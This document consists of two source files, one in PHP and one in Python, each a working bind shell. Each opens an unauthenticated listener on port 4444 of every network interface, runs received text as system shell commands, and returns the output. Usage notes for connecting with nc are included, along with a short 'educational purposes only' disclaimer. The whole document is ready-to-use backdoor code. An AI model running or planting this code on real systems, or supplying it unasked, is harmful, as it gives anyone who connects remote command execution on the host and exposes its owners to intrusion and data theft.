File: bind_shell.php
<?php
/**
 * Minimalist PHP Bind shell CLI TCP Socket Server
 *
 * This script initializes a single-threaded TCP network listener using PHP's low-level 
 * sockets extension. It accepts incoming network connections, reads string data line-by-line, 
 * passes the input to the system's execution layer via shell_exec(), and streams the raw 
 * stdout back to the connected client socket. Includes connection lifecycle safeguards 
 * to handle abrupt client disconnects cleanly.
 *
 * PHP Version: 7.0 or higher (Requires 'sockets' extension enabled)
 *
 * You can adjust $port variable to change the listening port.
 * 
 * Usage:
 * Start the server: php bind_shell.php
 * Connect to the server: nc <ip_address> <port>
 *
 * Disclaimer: This code is for educational purposes only. Use it at your own risk.
 */

$address = '0.0.0.0';
$port = 4444;

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket === false) {
    die("Error: Could not create socket.\n");
}

socket_set_option($socket, SOL_SOCKET, SO_REUSEADDR, 1);

if (socket_bind($socket, $address, $port) === false) {
    die("Error: Could not bind socket to {$address}:{$port}.\n");
}

socket_listen($socket, 5);
echo "Server listening on {$address}:{$port}...\n";

while (true) {
    $client = socket_accept($socket);
    if ($client === false) {
        continue;
    }
    
    $client_ip = '';
    $client_port = 0;
    socket_getpeername($client, $client_ip, $client_port);
    echo "Connection established from {$client_ip}:{$client_port}\n";
    
    $welcome = "Connected to the PHP bind shell server.\nType your command (or 'exit' to disconnect)\n";
    socket_write($client, $welcome, strlen($welcome));
    
    while (true) {
        $input = socket_read($client, 2048);
        
        if ($input === false || $input === '') {
            break;
        }
        
        $trimmed = trim($input);
        
        if ($trimmed === 'exit') {
            $goodbye = "Goodbye!\n";
            socket_write($client, $goodbye, strlen($goodbye));
            break;
        }
        
        if ($trimmed !== '') {
            $output = shell_exec($trimmed);
            socket_write($client, $output, strlen($output));
        }
    }
    
    echo "Client {$client_ip}:{$client_port} disconnected.\n";
    socket_close($client);
}

socket_close($socket);
?>

File: bind_shell.py
#!/usr/bin/env python3
"""
Bind Shell

A minimalist, single-threaded TCP bind shell server.
Listens on a specified port, accepts incoming connections, and executes 
received strings as system shell commands. Combines stdout and stderr, 
returning the complete output to the connected client. Includes a timeout 
mechanism to prevent the server from hanging on interactive commands.
You can adjust the `PORT` and `TIMEOUT` constants to change the listening port
and command timeout duration.
    
Usage:
    Start the server: python bind_shell.py
    Connect to the server: nc ip_address listening_port

Disclaimer: 
    This code is for educational purposes only. Use it at your own risk. 
"""

import socket
import subprocess

PORT = 4444
TIMEOUT = 10

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('0.0.0.0', PORT))
s.listen(1)

print(f"Bind shell listening on port {PORT} with timeout {TIMEOUT}s")

while True:
    conn, _ = s.accept()
    f = conn.makefile('r', encoding='utf-8', errors='ignore')
    
    for cmd in f:
        cmd = cmd.strip()
        if not cmd: 
            continue
        if cmd.lower() == 'exit': 
            break
        
        try:
            out = subprocess.run(cmd, shell=True, capture_output=True, timeout=TIMEOUT)
            conn.sendall(out.stdout + out.stderr)
        except subprocess.TimeoutExpired:
            conn.sendall(f"Error: Command timed out after {TIMEOUT}s\n".encode())
        except Exception as e:
            conn.sendall(f"Error: {str(e)}\n".encode())
            
    conn.close()
